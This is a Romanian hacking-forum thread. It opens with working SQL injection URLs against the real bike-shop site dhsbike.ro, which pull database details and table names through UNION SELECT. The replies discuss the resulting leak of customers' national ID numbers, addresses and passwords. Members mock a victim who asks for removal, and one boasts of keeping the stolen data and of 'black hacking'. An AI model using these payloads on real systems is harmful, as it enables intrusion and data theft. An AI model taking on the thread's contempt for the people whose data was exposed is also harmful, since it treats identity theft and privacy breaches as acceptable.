www.dhsbike.ro

[Ne0h]

MySQL Info:

Code:

http://www.dhsbike.ro/index.php?id_page=9+and+1=2+union+all+select+1,2,group_concat(version(),0x3a,database(),0x3a,user()),4,5,6--

Tabelul cu clienti:

Code:

http://www.dhsbike.ro/index.php?id_page=9+and+1=2+union+all+select+1,2,table_name,4,5,6%20from%20information_schema.tables%20limit%2018,1--

[Kabron]

Sters ))

GEN :

salut frate,

am descoperit ca sunt facute publice datele mele personale pe net, cum ar fi CNP-ul, adresa de acasa,,,,,

Doar utilizatorii inregistrati pot vedea linkurile. [ Click aici pentru a te inregistra ]

am obs ca tu ai postat ,, acel link

te rog f. frumos sa stergi acel link, daca nu o sa iti fac o plangere la bsa , militie, vad pe unde,

sunt datele mele confidentiale,, si nu ar trebui sa iti bati joc,,

deci pana maine sa vad ca le-ai sters, ms


--------------------------------------------------


AHAHAHAHAHAHAH !

IDIOTULE CARE ESTI TU IDIOT CUM AR SPUNE CINEVA !
Q.Reply nu incalca nici o LEGE ))))))))))))))))))

[Nemessis]

Era vulnerabil si la rfi.

[Ne0h]

Nu am stiut ca este vechi.Il aveam prin PC mai demult si dadusem peste el din greseala.

[dhsbike.informatii]

Salut

Sunt unul dintre cei listati in baza de date a dhsbike. Am gasit postul intamplator, cautand pe google nr. meu de telefon.

Apreciez intentia forumului (de 'white hacking'), si chiar pot spune ca incidentul acesta ma va face mult mai precaut pe viitor in ce priveste site-urile pe care ma inregistrez si informatiile personale pe care le completez in formulare.

In schimb cred ca Ne0h ar fi trebuit sa truncheze informatiile pe care le-a postat... ar fi fost un efort minim si cred ca oricine poate fi convins ca dhsbike este vulnerabil daca vede primele cateva cifre din CNP/o parte din adresa. Cred ca membrii activi ai forumului stiu mult mai bine ca mine ce se poate face cu informatiile listate.

@Ne0h te-as ruga sa modifici postul, pentru a evita situatii neplacute ce pot decurge de aici. Cred ca nimeni nu ar vrea sa-i stea pe net liber accesibile datele personale, parolele etc. Multumesc pentru intelegere.

[Ne0h]

Ok,am sa fac cum m-ai rugat.

[SympleBoy22]

Sa modifice si Karbon Quote-ul

[Jigsaw4]

Ownerul a trimis un mass hehe:
Quote:
Buna ziua,

Va scriu acest mail pentru a va instiinta ca o parte din baza de date a dhsbike.ro este public accesibila pe internet. Aceasta inseamna ca o serie de informatii precum CNP, adresa completa, parola de la contul dhsbike si altele pot fi vizualizate de catre oricine ajunge pe forum-ul Doar utilizatorii inregistrati pot vedea linkurile. [ Click aici pentru a te inregistra ]

Cum am aflat?... ei bine dintr-un banal search pe google dupa numarul meu de telefon. Iar asta este valabil pentru toti cei listati pe respectivul forum.

Prima masura pe care sper ca dhsbike o va lua este de a-i instiina in cel mai scurt timp (eventual telefonic, poate ca mailul meu va fi citit mult mai tarziu) pe toti cei listati cu privire la aceasta scurgere de informatii, si de a lua legatura cu rstcenter in vederea modificarii postului cu lista de informatii. Eu deja am scris un post in care am cerut asta, si sper ca cel care a postat sa modifice postul initial.

Sper ca gravitatea situatiei este inteleasa de dhsbike.ro si se vor lua masurile necesare cat mai rapid.

Din cate am inteles rasfoind forumul, rstcenter este un site de "white hacking", adica descopera vulnerabilitati in diferite site-uri si le fac publice pentru a trage un semnal de alarma cu privire la lipsa de securiatate a acestora (spre deosebire de black hackers care folosesc informatiile obtinute in scopuri malefice). Faptul ca lista cu informatii complete a fost postata mi se pare ca se abate de la acest "principiu", dar sper ca in curand sa dispara/sa fie modificata.

Si eu ma aflu in lista publicata pe forumul rstcenter dar prefer sa imi pastrez identitatea necunoscuta (de aceea am ales sa trimit mailul de pe acest cont, creat special).

Epic Phail

[SympleBoy22]

Unde scrie ca e forum de white hacking?

[Jigsaw4]

Cu nr. de tel si cu acces la mail poti face minuni Numai tre sa gandesti putin
Da....eu am salvat informatiile ....cine stie...2012 imd e aici
BLACK HACK 4 EVER ,FUCK THE RULES!